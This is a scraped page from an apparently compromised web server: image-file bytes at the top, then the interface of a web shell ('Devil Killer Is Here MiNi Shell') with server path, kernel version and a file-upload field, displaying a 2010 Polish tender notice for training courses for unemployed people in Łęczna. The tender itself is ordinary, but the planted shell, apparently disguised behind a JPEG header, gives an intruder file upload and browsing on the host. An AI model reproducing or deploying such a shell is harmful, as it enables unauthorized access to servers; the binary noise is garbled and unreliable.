JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100811/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100811/245322-N-2010.html

<p class="kh_header"><b>Łęczna: Przetarg nieograniczony na przeprowadzenie szkoleń dla osób bezrobotnych realizowanych ze środków Funduszu Pracy. Szkolenia: Barman- kelner, Podstawy obsługi komputera i urządzeń biurowych, Spawanie metodami 111 i 311, Piekarz z modułem wyrobu i wypieku pizzy, Obsługa kasy fiskalnej z elementami obsługi komputera, Spawanie metodami 135 i 141 (MAG i TIG).</b><br>
<b>Numer ogłoszenia: 245322 - 2010; data zamieszczenia: 11.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy , AL. Jana Pawła II 95, 21-010 Łęczna, woj. lubelskie, tel. 81 7521158, faks 81 7521031.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://pup.leczna.ibip.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg nieograniczony na przeprowadzenie szkoleń dla osób bezrobotnych realizowanych ze środków Funduszu Pracy. Szkolenia: Barman- kelner, Podstawy obsługi komputera i urządzeń biurowych, Spawanie metodami 111 i 311, Piekarz z modułem wyrobu i wypieku pizzy, Obsługa kasy fiskalnej z elementami obsługi komputera, Spawanie metodami 135 i 141 (MAG i TIG)..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część I
 Barman-kelner
Liczba godzin: 200 godzin zegarowych. Zajęć praktycznych powinno być nie mniej niż 150 godzin zegarowych.
Liczba osób: 10
Liczba grup kursowych: 1 
Termin szkolenia: wrzesień 2010r - październik 2010r
Program szkolenia obejmuje minimum następujące zagadnienia:
- zawód barman: wiadomości wstępne
- dobra praktyka higieniczna
- BHP na stanowisku pracy
- struktura organizacyjna zakładu gastronomicznego
- profesjonalna obsługa klienta
- zastawa i bielizna stołowa
- obsługa gości przy stole
- techniki noszenia talerzy i podawania potraw
- charakterystyka, zasady i techniki przygotowywania i podawania napojów alkoholowych, bezalkoholowych i mieszanych
- obsługa kasy fiskalnej
- zajęcia aktywizacyjne
- zajęcia praktyczne
Dokumentem potwierdzającym ukończenie szkolenia będzie: 
Zaświadczenie ukończenia kursu zgodne z Rozporządzeniem Ministra Edukacji i Nauki z dnia 3 lutego 2006 r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. Nr 31, poz. 216).
- Szkolenie powinno zakończyć się egzaminem wewnętrznym.
Część II
 Podstawy obsługi komputera i urządzeń biurowych
Liczba godzin: 120 godzin zegarowych.
Liczba osób: 15
Liczba grup kursowych: 1 
Termin szkolenia: wrzesień 2010r - październik 2010r
Program szkolenia obejmuje minimum następujące zagadnienia:
- budowa komputera 
- podstawy obsługi komputera
- system Windows
- MS Word- edytor tekstu
- MS Excel- arkusz kalkulacyjny
- MS PowerPoint- program prezentacyjny
- poczta elektroniczna, Internet
- obsługa urządzeń biurowych
- zajęcia aktywizacyjne
Dokumentem potwierdzającym ukończenie szkolenia będzie: 
Zaświadczenie ukończenia kursu zgodne z Rozporządzeniem Ministra Edukacji i Nauki z dnia 3 lutego 2006 r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. Nr 31, poz. 216).
-  Szkolenie powinno zakończyć się egzaminem wewnętrznym.
Część III
 Spawanie metodami 111 i 311
Liczba godzin: 230 godzin zegarowych. Zajęć praktycznych powinno być nie mniej niż 150 godzin zegarowych oraz dwie godziny zegarowe poza programem szkolenia przeznaczone na egzamin państwowy.
Liczba osób: 15
Liczba grup kursowych: 1 
Termin szkolenia: wrzesień 2010r - październik 2010r
Program szkolenia obejmuje minimum następujące zagadnienia
- zajęcia teoretyczne w zakresie spawania metodą 311 i 111
- zajęcia praktyczne w zakresie spawania metodą 311 i 111
- rysunek techniczny
- zajęcia z zakresu prawa pracy
- zajęcia aktywizacyjne
- Jednostka szkoleniowa uprawniona do szkolenia spawaczy powinna być nadzorowana przez jednostkę właściwą. Program szkolenia musi zawierać liczbę godzin nauczania zgodną z programem i wytycznymi Instytutu Spawalnictwa w Gliwicach.  Dopuszcza się rozszerzenie programu szkolenia o dodatkowe godziny zajęć w ramach zagadnień wynikających z programu szkolenia, mieszczące się w wymaganej liczbie godzin. Wymagane są zajęcia zgodne z programem i wytycznymi Instytutu Spawalnictwa w Gliwicach. Każdy uczestnik szkolenia po jego zakończeniu powinien otrzymać zaświadczenie ukończenia kursu zgodne z Rozporządzeniem Ministra Edukacji i Nauki z dnia 3 lutego 2006 r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. Nr 31, poz. 216) a po pozytywnym zdaniu egzaminu książeczkę spawacza wraz ze Świadectwem Egzaminu Kwalifikacyjnego Spawacza wydanym przez Instytut Spawalnictwa w Gliwicach. Szkolenie powinno się zakończyć egzaminem państwowym. 
Część IV
 Piekarz z modułem wyrobu i wypieku pizzy
Liczba godzin: 210 godzin zegarowych.
Liczba osób: 10
Liczba grup kursowych: 1 
Termin szkolenia: wrzesień 2010r - październik 2010r
Program szkolenia obejmuje minimum następujące zagadnienia:
- wiadomości wstępne
- zasady przestrzegania higieny w procesie produkcji żywności i w obrocie żywnością: dobra praktyka higieniczna
- BHP na stanowisku pracy
- struktura organizacyjna zakładu piekarniczego
- technologia produkcji
- maszyny i urządzenia piekarnicze
- czynności poprodukcyjne
- wyrób i wypiek pizzy
- organizacja i zarządzanie zakładem piekarniczym
- zajęcia praktyczne
Dokumentem potwierdzającym ukończenie szkolenia będzie: 
Zaświadczenie ukończenia kursu zgodne z Rozporządzeniem Ministra Edukacji i Nauki z dnia 3 lutego 2006 r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. Nr 31, poz. 216).
- Szkolenie powinno zakończyć się egzaminem wewnętrznym.
Część V
 Obsługa kasy fiskalnej z elementami obsługi komputera
Liczba godzin: 100 godzin zegarowych.
Liczba osób: 15
Liczba grup kursowych: 1 
Termin szkolenia: październik 2010r
Program szkolenia obejmuje minimum następujące zagadnienia:
- obsługa kasy fiskalnej
- dokumentacja handlowa
- profesjonalna obsługa klienta
- marketing w sprzedaży
- podstawy obsługi komputera
- obsługa komputerowych programów handlowych
- zajęcia aktywizacyjne
Dokumentem potwierdzającym ukończenie szkolenia będzie: 
Zaświadczenie ukończenia kursu zgodne z Rozporządzeniem Ministra Edukacji i Nauki z dnia 3 lutego 2006 r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. Nr 31, poz. 216).
- Szkolenie powinno zakończyć się egzaminem wewnętrznym.
Część VI
Spawanie metodami 135 i 141 (MAG i TIG)
Liczba godzin: 200 godzin zegarowych. Zajęć praktycznych powinno być nie mniej niż 150 godzin zegarowych oraz dwie godziny zegarowe poza programem szkolenia przeznaczone na egzamin państwowy.
Liczba osób: 10
Liczba grup kursowych: 1 
Termin szkolenia: wrzesień 2010r. - październik 2010r.
Zakres szkolenia powinien obejmować w szczególności następujące zagadnienia:
- zajęcia teoretyczne w zakresie spawania metodą 135 i 141
- zajęcia praktyczne w zakresie spawania metodą 135 i 141
- rysunek techniczny
- zajęcia z zakresu prawa pracy
- zajęcia aktywizacyjne
- Jednostka szkoleniowa uprawniona do szkolenia spawaczy powinna być nadzorowana przez jednostkę właściwą. Program szkolenia musi zawierać liczbę godzin nauczania zgodną z programem i wytycznymi Instytutu Spawalnictwa w Gliwicach.  Dopuszcza się rozszerzenie programu szkolenia o dodatkowe godziny zajęć w ramach zagadnień wynikających z programu szkolenia, mieszczące się w wymaganej liczbie godzin. Wymagane są zajęcia zgodne z programem i wytycznymi Instytutu Spawalnictwa w Gliwicach. Każdy uczestnik szkolenia po jego zakończeniu powinien otrzymać zaświadczenie ukończenia kursu zgodne z Rozporządzeniem Ministra Edukacji i Nauki z dnia 3 lutego 2006 r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. Nr 31, poz. 216) a po pozytywnym zdaniu egzaminu książeczkę spawacza wraz ze Świadectwem Egzaminu Kwalifikacyjnego Spawacza wydanym przez Instytut Spawalnictwa w Gliwicach. Szkolenie powinno się zakończyć egzaminem państwowym..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.53.30.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 2.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli wykonawca:
­	wykaże, że posiada aktualny wpis do rejestru instytucji szkoleniowych prowadzony przez właściwy Wojewódzki Urząd Pracy /art. 20 ustawy z dnia 20.04.2004r. 
o promocji zatrudnienia i instytucjach ryku pracy/.
1.	W celu potwierdzenia spełniania warunku udziału w postępowaniu do oferty należy złożyć:
a)	oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu art. 22 ust. 1 ustawy z dnia 29.01.2004r. prawo zamówień publicznych - załącznik nr 2 do SIWZ
b)	oświadczenie Wykonawcy o niepodleganiu wykluczeniu z postępowania, z przyczyn o których mowa w art. 24 ustawy Prawo zamówień publicznych - załącznik nr 3 do SIWZ.
c)	zaświadczenie o wpisie instytucji szkoleniowej do rejestru instytucji szkoleniowych prowadzonego przez właściwy Wojewódzki Urząd Pracy oraz informacje o kontynuowaniu działalności szkoleniowej w 2010r.
d)	aktualny odpis z właściwego rejestru wystawione nie wcześniej niż sześć miesięcy przed upływem terminu składania oferty, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy z dnia 29.01.2004r. Prawo zamówień publicznych - załącznik nr 4 do SIWZ
Ocena spełniania warunków nastąpi w oparciu o prawidłowość złożonych dokumentów i oświadczeń na zasadzie: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca
­	wykaże, że wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 1 usługę szkoleniową o tematyce zgodnej z przedmiotem zamówienia w danej części przeprowadzonej w ciągu ostatnich trzech lat wraz z podaniem jej wartości, dat wykonania, odbiorców oraz przedstawi dokument na potwierdzenie, że usługa została wykonana należycie,
­	wykaże, że posiada wiedzę i doświadczenie w zakresie sprawdzania efektów szkolenia podczas realizowanych szkoleń,
­	wykaże, że posiada wiedzę i doświadczenie w zakresie zapewnienia nadzoru wewnętrznego służącego podnoszeniu jakości prowadzonego szkolenia,
1.	W celu potwierdzenia spełniania warunku udziału w postępowaniu do oferty należy złożyć:
a)	wykaz wykonanych w ciągu ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej jednej usługi szkoleniowej o tematyce zgodnej z przedmiotem zamówienia w danej części wraz z podaniem jej wartości, dat wykonania, odbiorców i przedstawi dokument na potwierdzenie, że usługi wszystkie wskazane w wykazie zostały wykonane należycie.
b)	opracowany przez Wykonawcę wzór ankiety dla uczestników szkolenia służącej do oceny szkolenia,
c)	opracowany i wykorzystywany przez Wykonawcę dokument potwierdzający zapewnienie nadzoru wewnętrznego służącego podnoszeniu jakości prowadzonego szkolenia. 
Ocena spełniania warunków nastąpi w oparciu o prawidłowość złożonych dokumentów i oświadczeń na zasadzie: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca
1.	Wykaże, że dysponuje telefonem, faksem, kserokopiarką, drukarką, skanerem, rzutnikiem lub projektorem, flipchartem lub tablicą - dotyczy wszystkich części.
2.	Wykaże, że dysponuje salą dydaktyczną adekwatną do ilości uczestników szkolenia z osobnymi stanowiskami dla każdego uczestnika  z uwzględnieniem bezpiecznych i higienicznych warunków pracy i nauki, warunki BHP musi spełniać również zaplecze socjalne - dotyczy wszystkich części.
3.	Wykaże, że zajęcia praktyczne zorganizowane będą w lokalu gastronomicznym umożliwiającym realizację programu szkolenia - dotyczy części I.
4.	Wykaże, że zajęcia praktyczne zorganizowane będą w piekarni umożliwiającej realizację programu szkolenia - dotyczy części IV. 
5.	Wykaże, że dysponuje materiałami i urządzeniami odpowiednimi do prawidłowej realizacji programu szkolenia - dotyczy części I i IV.
6.	Wykaże, że dysponuje samodzielnymi stanowiskami przy zajęciach praktycznych dla wszystkich uczestników szkolenia wyposażonymi w odpowiedni sprzęt zapewniający realizację programu - dotyczy części I, III, IV,VI. 
7.	Wykaże, że dysponuje co najmniej 15 komputerami stacjonarnymi lub komputerami przenośnymi z monitorem lub wyświetlaczem z legalnym oprogramowaniem systemowym, jednakowym dla wszystkich uczestników, z dostępem do Internetu - II, V.
8.	Wykaże, że dysponuje co najmniej 15 kasami fiskalnymi, które spełniają wymagania rozporządzenia Ministra Finansów z dnia 28.11.2008r. w sprawie kryteriów i warunków technicznych, którym muszą odpowiadać kasy  rejestrujące oraz warunków ich stosowania /Dz. U. Nr 212, poz. 1338/ - dotyczy części V.
Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym tj. sali, narzędziach, urządzeniach i osobach zdolnych do wykonania zamówienia niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu do oferty pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.
1.	W celu potwierdzenia spełniania warunku udziału w postępowaniu do oferty należy złożyć:
a)	Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu (art. 22 ust. 1 ustawy z dnia 29.01.2010r. - załącznik nr 2 do SIWZ
b)	Wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych Wykonawcy w celu realizacji zamówienia wraz z informacją o podstawie dysponowania tymi zasobami, a jeśli Wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym tj. sali, narzędziach, urządzeniach do wykonania zamówienia pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia - załącznik nr 8 do SIWZ
Ocena spełniania warunków nastąpi w oparciu o prawidłowość złożonych dokumentów i oświadczeń na zasadzie: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca
9.	Wykaże, że dysponuje kadrą posiadającą kwalifikacje zawodowe, doświadczenie i wykształcenie niezbędne do wykonania zamówienia: każda osoba z kadry podstawowej i rezerwowej posiada doświadczenie w postaci zrealizowania co najmniej 1 szkolenia podobnego pod względem merytorycznym co przedmiot zamówienia - dotyczy wszystkich części.
Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym tj. sali, narzędziach, urządzeniach i osobach zdolnych do wykonania zamówienia niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu do oferty pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.
1.	W celu potwierdzenia spełniania warunku udziału w postępowaniu do oferty należy złożyć:
c)	Wykaz kadry ( z wyszczególnieniem na kadrę podstawową i rezerwową), która będzie uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności w danej części postępowania oraz informacją o podstawie do dysponowania tymi osobami - załącznik nr 6 i 7 do SIWZ
Ocena spełniania warunków nastąpi w oparciu o prawidłowość złożonych dokumentów i oświadczeń na zasadzie: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli Wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia. W celu potwierdzenia spełniania warunku udziału w postępowaniu należy złożyć oświadczenie (art. 22 ust. 1 ustawy z dnia 29.01.2004r. Prawo zamówień publicznych) - załącznik nr 2 do SIWZ.

Ocena spełniania warunków nastąpi w oparciu o prawidłowość złożonych dokumentów i oświadczeń na zasadzie: spełnia - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
